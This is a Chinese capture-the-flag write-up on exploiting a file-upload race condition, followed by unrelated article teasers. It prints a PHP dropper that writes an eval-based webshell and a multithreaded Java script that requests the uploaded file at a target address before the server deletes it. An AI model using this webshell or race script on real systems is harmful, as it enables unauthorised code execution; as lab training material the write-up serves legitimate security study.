【漏洞攻击之文件上传条件竞争】

漏洞攻击之文件上传条件竞争

  • wzsc_文件上传
  • 漏洞现象与分析
  • 思路
  • 编写攻击脚本和重放措施
  • 中国蚁剑拿flag

wzsc_文件上传

漏洞现象与分析

在这里插入图片描述只有一个upload前端标签元素,并且上传任意文件都会跳转到upload.php页面,判定是一个apache容器,开始扫描web目录,查看是否有机可乘
在这里插入图片描述扫描得知有关键的flag.php页面和upload文件根路径和upload.php页面,php文件查看了都没有渲染有用的信息…但是upload文根重定向到文件上传的页面
在这里插入图片描述并且上传的php木马等都会被过滤,判断源码中有校验白名单,联想到文件上传的条件竞争

php校验文件上传的时候先写入,判断不符合后,再回退
由于服务器并发处(同时)理多个请求,假如a用户上传了一个文件,b用户访问a用户的文件就会出现以下三种情况:
1.访问时间点在上传文件之前,没有此文件
2.访问时间在上传文件之后,且服务器还未将其删除,文件存在
3.访问时间点在服务器删除文件之后,文件不存在

思路

思路清晰,先说BP
在服务器释放上传的php文件之前先让该文件被执行,那么操作权就在我们手上了,这里我们让生成蚁剑的webshell木马,再通过提权webshell获取源码拿到flag

编写攻击脚本和重放措施

php上传的脚本为:

<?php 
fputs(fopen("shell.php", "w"), '<?php @eval($_POST["cmd"]); ?>'); 
?>

执行该脚本打时候调用fopen函数,写入webshell的木马。
该脚本为upload,在burpsuite手动重放即可,记得点快一点
小编使用java多线程破坏服务器的退回操作,上脚本:

@SpringBootApplication
@Slf4j
public class Application {

    @Bean
    public OkHttpClient okHttpClient() {
        return new OkHttpClient();
    }

    private static final String requestUrl = "http://61.147.171.105:51022/upload/test.php";

    public static String sendRequest(OkHttpClient okHttpClient, String url) throws IOException {
        Request request = new Request.Builder().url(url).build();
        try (Response response = okHttpClient.newCall(request).execute()) {
            if (!response.isSuccessful()) {
                throw new IOException("Unexpected code " + response);
            }
            return Objects.requireNonNull(response.body()).string();
        }
    }

    public static void main(String[] args) {
        ConfigurableApplicationContext applicationContext = SpringApplication.run(Application.class, args);
        OkHttpClient okHttpClient = applicationContext.getBean("okHttpClient", OkHttpClient.class);
        for (int i = 0; i < 50; i++) {
            new Thread(() -> {
                int num = 0;
                while (true) {
                    log.warn("{}第{}次请求", Thread.currentThread().getName(), num++);
                    try {
                        String resp = sendRequest(okHttpClient, requestUrl);
                        log.info("数据获取成功{}", resp);
                        System.exit(0);
                    } catch (IOException e) {
                    }
                }
            }, "threadNo" + i).start();
        }
    }
}

最终java脚本结束:
在这里插入图片描述
我们访问upload文根查看结果
在这里插入图片描述
木马上传成功!

中国蚁剑拿flag

在这里插入图片描述在这里插入图片描述

在这里插入图片描述提交flag
在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/333706.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

什么是车载信息娱乐系统和集成驾驶舱

什么是车载信息娱乐系统(IVI)? “车载信息娱乐(IVI)”通过向驾驶员和乘客提供信息和娱乐&#xff0c;为驾驶提供便利和舒适。为了理解这个概念&#xff0c;有必要知道“信息娱乐”的含义。“信息娱乐”是这个市场中使用的一个词&#xff0c;它结合了“信息”和“娱乐”两个词…

「达摩院MindOpt」优化形状切割问题(MILP)

1. 形状切割问题 在制造业&#xff0c;高效地利用材料不仅是节约成本的重要环节&#xff0c;也是可持续发展的关键因素。无论是在金属加工、家具制造还是纺织品生产中&#xff0c;原材料的有效利用都直接影响了整体效率和环境影响。 形状切割问题&#xff08;Shape Cutting o…

区域入侵检测AI边缘计算智能分析网关V4如何通过ssh进行服务器远程运维

智能分析网关V4是一款高性能、低功耗的AI边缘计算硬件设备&#xff0c;它采用了BM1684芯片&#xff0c;集成高性能8核ARM A53&#xff0c;主频高达2.3GHz&#xff0c;并且INT8峰值算力高达17.6Tops&#xff0c;FB32高精度算力达到2.2T&#xff0c;每个摄像头可同时配置3种算法&…

万户 ezOFFICE wf_printnum.jsp SQL注入漏洞复现

0x01 产品简介 万户OA ezoffice是万户网络协同办公产品多年来一直将主要精力致力于中高端市场的一款OA协同办公软件产品,统一的基础管理平台,实现用户数据统一管理、权限统一分配、身份统一认证。统一规划门户网站群和协同办公平台,将外网信息维护、客户服务、互动交流和日…

VUE--插槽slot(将父级的模块片段插入到子级中)

组件可以接收任意类型的JS值作为props&#xff0c;但我们想要为子组件传递一些模板片段&#xff0c;并在子组件中进行渲染时&#xff0c;此时可以采用插槽slot来实现 简单来说&#xff0c;插槽时组件内留一个或多个插槽的位置&#xff0c;供组件传递对应的模板代码&#xff08;…

深入解析与实践:Ajax异步请求在Web开发中的应用指南

一、概述 1、定义 ​ Ajax&#xff08;Asynchronous JavaScript and XML&#xff09;异步请求是现代Web开发中不可或缺的技术组件&#xff0c;它允许网页在不刷新整个页面的情况下从服务器获取并更新数据&#xff0c;从而实现动态、流畅的交互体验。 2、异步和同步 浏览器访…

目标文献分析方法

如何正确选题&#xff1f; 不仅仅是题目&#xff0c;而是研究工作的起步选题步骤&#xff1f; 发现问题选择方向调查研究分析论证确定选题 中国知网 深度学习方向词 1检索&#xff1a;深度学习 医疗影像 1 发表时间要最新 2 显示50个&#xff0c;全选 3 导出文献格式Ref 4 导…

无法打开浏览器开发者工具的可能解决方法

网页地址: https://jx.xyflv.cc/?url视频地址url 我在抖音里面抓了一个视频地址, 获取到响应的json数据, 找到里面的视频地址信息 这个网站很好用: https://www.jsont.run/ 可以使用js语法对json对象操作, 找到所有视频的url地址 打开网页: https://jx.xyflv.cc/?urlhttps:…

最推荐的视频播放器——PotPlayer

PotPlayer&#xff0c;是The KMPlayer的原作者姜勇囍进入Daum公司后的新一代作品&#xff0c;目前仍有更新。由于采用Delphi编译程式的KMPlayer有一些弊端&#xff0c;姜勇囍为改进播放器本身的一些效能而重新用VC进行构架。 除了支持3D视频外&#xff0c;PotPlayer还覆盖支持…

MetaGPT-打卡-day2,MetaGPT框架组件学习

文章目录 Agent组件实现一个单动作的Agent实现一个多动作的Agent技术文档生成助手其他尝试 今天是第二天的打卡~昨天是关于一些概念的大杂烩&#xff0c;今天的话&#xff0c;就来到了Hello World环节。 从单个Agnet到多个Agent&#xff0c;再到组合更复杂的工作流来解决问题。…

分类预测 | Matlab实现CS-SVM布谷鸟算法优化支持向量机的数据分类预测

分类预测 | Matlab实现CS-SVM布谷鸟算法优化支持向量机的数据分类预测 目录 分类预测 | Matlab实现CS-SVM布谷鸟算法优化支持向量机的数据分类预测分类效果基本描述程序设计参考资料 分类效果 基本描述 1.Matlab实现CS-SVM布谷鸟算法优化支持向量机的数据分类预测。 2.自带数据…

均线和布林线这样的关系,WeTrade众汇实例这样使用

在后台经常有交易者咨询:“我可以用加权平均线或指数代替移动平均线吗?”理论上&#xff0c;任何平均值都适合绘制BB。在回答这个问题之前&#xff0c;为了稳妥起见&#xff0c;WeTrade众汇通过对各种均线对比分析&#xff0c;却得出这样结论:经典均线是构建参考点最简单、最准…

element-plus表格判断table中的数据是否换行展示,如果换行展示,替换为....

文章目录 需求分析 需求 element-plus表格判断table中的数据是否换行展示&#xff0c;如果换行展示&#xff0c;替换为… 分析 <style lang"less" scoped>::v-deep(.el-table .cell) {overflow: hidden; // 溢出隐藏text-overflow: ellipsis; // 溢出用省略号…

蓝桥杯(C++ 整数删除 优先队列 )

优先队列&#xff1a; 优先队列具有队列的所有特性&#xff0c;包括队列的基本操作&#xff0c;只是在这基础上添加了内部的一个排序&#xff0c;它本质是一个堆实现的。 1.头文件&定义 #include <queue> #include <functional> //greater<>// 定义 p…

如何使用@font-face

font-face css 提供的font-face可以让开发者自定义项目中的字体。字体可以从远程服务器获取&#xff0c;也可以从本地加载。 font-face {font-family: "Open Sans";src:url("/fonts/OpenSans-Regular-webfont.woff2") format("woff2"),url(&qu…

鸿蒙开发实战-OpenHarmony沙箱文件

在openharmony文件管理模块中&#xff0c;按文件所有者分类分为应用文件和用户文件和系统文件。 1&#xff09;沙箱文件。也叫做应用文件&#xff0c;包括应用安装文件、应用资源文件、应用缓存文件 二.文件详解 在使用时首先需要导入包 import fs from “ohos.file.fs”&am…

某马头条——day05

文章定时发布 实现方案对比 实现方案 延迟队列服务实现 按照文档进行项目的导入并准备数据库表导入对应实体类和nacos配置中心 乐观锁集成 redis集成和测试 成功集成通过测试 添加任务 ①&#xff1a;拷贝mybatis-plus生成的文件&#xff0c;mapper ②&#xff1a;创建task类…

C++ 设计模式之观察者模式

【声明】本题目来源于卡码网&#xff08;题目页面 (kamacoder.com)&#xff09; 【提示&#xff1a;如果不想看文字介绍&#xff0c;可以直接跳转到C编码部分】 【设计模式大纲】 前面的文章介绍了创建型模式和结构型模式&#xff0c;今天开始介绍行为型模式。 【简介】什么是…

Google play 应用批量下架的可能原因及应对指南

想必大多数上架马甲包或矩阵式上架的开发者们&#xff0c;都遭遇过应用包批量被下架、账号被封的情况。这很令人苦恼&#xff0c;那造成这种情况的可能原因有哪些呢&#xff1f;以及如何降低这种情况发生&#xff1f; 1、代码问题 通常上架成功后被下架的应用&#xff0c;很可…

PyTorch入门之Tensor综合-含操作/运算、机器学习的关系、稠密张量与稀疏张量的定义等

PyTorch入门之Tensor综合-含操作/运算、机器学习的关系、稠密张量与稀疏张量的定义等 Tensor的理解 数学中有标量、向量和矩阵的概念&#xff0c;它们的维度分别是0、1、2。其中&#xff1a; 标量可以看成的一个数字&#xff0c;1&#xff0c;标量中元素的位置固定。向量可以…